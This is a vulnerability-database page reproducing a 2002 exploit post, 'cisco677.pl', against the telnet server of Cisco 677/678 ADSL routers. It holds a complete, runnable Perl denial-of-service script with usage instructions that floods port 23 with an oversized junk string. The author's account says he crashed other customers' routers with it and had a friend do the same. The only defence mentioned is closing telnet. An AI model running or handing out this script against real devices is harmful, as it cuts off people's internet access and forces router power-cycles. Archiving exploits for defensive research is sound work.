Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

cisco677.pl

🗓️ 05 May 2002 00:00:00Reported by DNVType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

Cisco 677/678 Telnet overflow bug enables disruption of routers via unprotected Telnet servers.

Code
`  
Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR   
put public on www.deadmeat.dk on 5-5-2002.   
Thanks to all from DKW-stuff for testing.  
  
A warm night i was coding and lisen to some tecno music trying to   
overflow my BSD mashine.   
But then I put the wrong IP into my scrip my ADSL router lost the   
Internet connection.  
So I start wonder why? and start looking into the code...  
I found out that i have overflowed the telnet server  
in my adsl router. After that I got online and start chatting   
with others with same ISP and same Cisco ADSL-router...  
and there route died too then i use there IP.  
So I send the code to a friend and ask him to do the same...  
On every router with the Telnet server open the router's   
ping time got really high  
and some of them died and have to be powercycle.  
Please note: So fare cisco and the ISP have not done anything   
about this problem...  
  
To test it: try with the LAN_IP and WAN_IP it works best on LAN_IP side ;)  
the protection is: close your Telnet server in the router.   
Thats All!   
  
-DNV Email: dnv[at]dhbit.ca  
  
Here is the code:  
running:   
perl cisco677.pl -s [IP on Ciscorouter]  
  
--------------------cisco677.pl------------------  
#!/usr/bin/perl  
  
# close your Cisco 677 up on the Telnet server!   
# Made for fun only! port 23 is the Telnet server port on the router  
# By DNV THX to DKW-stuff  
use IO::Socket;  
use Getopt::Std;  
getopts('s:', \%args);  
if(!defined($args{s})){&usage; }  
$serv = $args{s};  
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;  
$data .= $foo x $number; $EOL="\015\012";  
$remote = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $args{s},  
PeerPort => "(23)",  
) || die("No Telnet server here! on $args{s}\n");  
$remote->autoflush(1);  
print $remote "$data". $EOL;  
while (<$remote>){ print }  
print("\nPackets Sent\n");  
sub usage {die("\n$0 -s <server>\n\n");}  
------------------------------------------------------  
  
  
------------------------------------------------  
This mail sent from DHBiT - http://mail.dhbit.ca  
Come get your free, secure 5MB mailbox today!  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 May 2002 00:00Current
7.4High risk
Vulners AI Score7.4
cisco 677telnet serveroverflow buginternet disruptionnetwork securityrouter protection.
25